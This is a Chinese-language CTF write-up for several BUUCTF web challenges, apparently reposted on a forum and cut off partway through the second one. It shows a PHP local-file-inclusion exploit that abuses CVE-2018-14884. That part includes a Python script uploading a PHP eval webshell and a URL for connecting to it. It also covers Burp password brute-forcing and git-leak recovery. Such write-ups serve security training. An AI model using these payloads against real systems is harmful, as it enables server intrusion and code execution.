BUUCTF-WEB(86-90)
ezinclude参考:php7 segment fault特性(CVE-2018-14884) - Eddie_Murphy - 博客园 (cnblogs.com)
[BUUCTF题解]ezinclude 1 - Article_kelp - 博客园 (cnblogs.com)
查看源码发现
https://img2023.cnblogs.com/blog/3439569/202406/3439569-20240617202115103-1273979484.png
然后抓包发现一个hash值
https://img2023.cnblogs.com/blog/3439569/202406/3439569-20240617202114637-248764631.png
然后我直接传参数,让pass即是这一个Hash值
?pass=fa25e54758d5d5c1927781a6ede89f8ahttps://img2023.cnblogs.com/blog/3439569/202406/3439569-20240617202114121-1526407381.png
然后我们访问flflflflag.php,网页访问直接就是404,我们在burp访问一下
https://img2023.cnblogs.com/blog/3439569/202406/3439569-20240617202113580-2023319724.png
然后有一个文件包含,我们输入
?file=php://filter/read=convert.base64-encode/resource=index.phphttps://img2023.cnblogs.com/blog/3439569/202406/3439569-20240617202113034-1097512049.png
然后没发现啥,看到了过滤了一些东西,然后我们得想办法getshell
然后查了一下可以利用CVE-2018-14884
使用php://filter/string.strip_tags导致php崩溃清空堆栈重启,如果在同时上传了一个文件,那么这个tmp file就会一直留在tmp目录,知道文件名就可以getshell,因为/tmp/xxx,里面的xxx是随机的,需要我们获取才能利用发现他着实还有一个dir.php,后面用于我们获取文件名。
https://img2023.cnblogs.com/blog/3439569/202406/3439569-20240617202112500-1078316048.png
以下是师傅的脚本
import requests
from io import BytesIO #BytesIO实现了在内存中读写bytes
payload = "<?php eval($_POST);?>"
data={'file': BytesIO(payload.encode())}
url="http://03c49e5c-9594-4b26-8498-0eb1f8203cff.node5.buuoj.cn:81/flflflflag.php?file=php://filter/string.strip_tags/resource=/etc/passwd"
r=requests.post(url=url,files=data,allow_redirects=False)运行事后,我们再次看一下这个dir.php,发现了多了一个文件
https://img2023.cnblogs.com/blog/3439569/202406/3439569-20240617202112064-2128525528.png
然后蚁剑连接
http://03c49e5c-9594-4b26-8498-0eb1f8203cff.node5.buuoj.cn:81/flflflflag.php?file=/tmp/phpFVc8V7连接上去也没有文件。
然后给脚本里面改一下,直接改成phpinfo,然后查看一下文件名,访问
/flflflflag.php?file=/tmp/phpeEMvZkhttps://img2023.cnblogs.com/blog/3439569/202406/3439569-20240617202111563-422344890.png
[网鼎杯 2018]Comment
参考:[BUUCTF题解][网鼎杯 2018]Comment - Article_kelp - 博客园 (cnblogs.com)
[网鼎杯 2018]Comment题解,超详细!_网鼎杯2018 comment-CSDN博客
[网鼎杯 2018]Comment(二次注入,git泄露,git恢复)_[网鼎杯 2018]comment 1-CSDN博客
随便发了一个批评
https://img2023.cnblogs.com/blog/3439569/202406/3439569-20240617202110806-1491309107.png
提示我们登录,密码是少了三位的,我们burp爆破一下,记得改一下位数
https://img2023.cnblogs.com/blog/3439569/202406/3439569-20240617202109523-172492059.png
然后爆破出来就是zhangwei666
https://img2023.cnblogs.com/blog/3439569/202406/3439569-20240617202109033-662569691.png
然后登陆进来没啥东西,然后扫描发现了git泄露
https://img2023.cnblogs.com/blog/3439569/202406/3439569-20240617202108672-645783223.png
然后我们使用githacker<a href="https://github.com/WangYihang/GitHacker" target="_blank" rel="noopener">WangYihang/GitHacker:
免责声明:如果侵犯了您的权益,请联系站长,我们会及时删除侵权内容,谢谢合作!更多信息从访问主页:qidao123.com:ToB企服之家,中国第一个企服评测及商务社交产业平台。
页:
[1]